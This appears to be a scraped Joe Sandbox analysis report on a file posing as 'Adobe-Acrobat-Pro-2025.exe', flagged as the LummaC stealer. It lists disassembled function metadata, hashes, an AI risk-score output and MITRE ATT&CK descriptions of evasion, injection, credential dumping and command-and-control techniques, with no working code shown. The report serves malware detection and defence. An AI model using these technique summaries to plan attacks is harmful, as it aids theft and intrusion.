Instruction Fuzzy Hash: 04C04C39A586128B960CDF20D8619B6733AA75F355758606C8006935A5DE25AC4BDA0C

Function 004284D9 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 212COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00428802
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00428877

Strings

-*, xrefs: 00428789

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: -*
API String ID: 237503144-3125313990
Opcode ID: 2e6de8c941c0b44c44cc4bc590b338f8f0c1cee0bc2f332296da2c10e960bc2a
Instruction ID: ad129438276d556b52ceb2c274c77134b0a4db4781e24c8a5b06b1651bd1dc43
Opcode Fuzzy Hash: 2e6de8c941c0b44c44cc4bc590b338f8f0c1cee0bc2f332296da2c10e960bc2a
Instruction Fuzzy Hash: 4C5121B5A4D3608BD3208F64A88176FB7E4AB85304F44093EF58597381DB79D806CB9B

Function 004286FB Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00428802
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00428877

Strings

-*, xrefs: 00428789

Memory Dump Source

Source File: 00000001.00000002.3418155076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Adobe-Acrobat-Pro-2025.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: -*
API String ID: 237503144-3125313990
Opcode ID: c8ad1b9715857791bb03eb757e21777fdaf09053c5b10fc091ce1a9b62d6c33b
Instruction ID: de51328113204de721b32d1a228cb4aa3dd3d6c60cff68635e479649a2de784a
Opcode Fuzzy Hash: c8ad1b9715857791bb03eb757e21777fdaf09053c5b10fc091ce1a9b62d6c33b
Instruction Fuzzy Hash: 495121B564D3608BD3218F64A88176FB7E4EBC5304F440A3EF58597381DB79D8068B9B

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Adobe-Acrobat-Pro-2025.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Adobe-Acrobat-Pr_34e0e0c6aac799108c673a33397bb48b249f7_eb91d539_00a5090a-d55f-4cdc-81ec-93f0a05e8dbd\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9A3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDACD.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDAFD.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Windows Analysis Report
Adobe-Acrobat-Pro-2025.exe

Function 02537FDD Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Function 0253815A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Function 008C2880 Relevance: 1.7, APIs: 1, Instructions: 242
COMMON

Function 008C2104 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Function 00435660 Relevance: 40.4, APIs: 6, Strings: 17, Instructions: 148
COMMON

Function 0043A7A0 Relevance: 28.8, APIs: 11, Strings: 5, Instructions: 841
memorycomCOMMON

Function 00424050 Relevance: 21.5, APIs: 2, Strings: 10, Instructions: 540
COMMON

Function 0040D4F2 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 292
COMMON

Function 004204E0 Relevance: 9.2, Strings: 7, Instructions: 434
COMMON

Function 00409460 Relevance: 9.1, Strings: 7, Instructions: 367
COMMON

Function 004084E0 Relevance: 7.8, APIs: 5, Instructions: 258
threadCOMMON

Function 0042EBAA Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 369
COMMON

Function 0042EEF7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 320
COMMON

Function 0042D8B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Function 0042D8AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre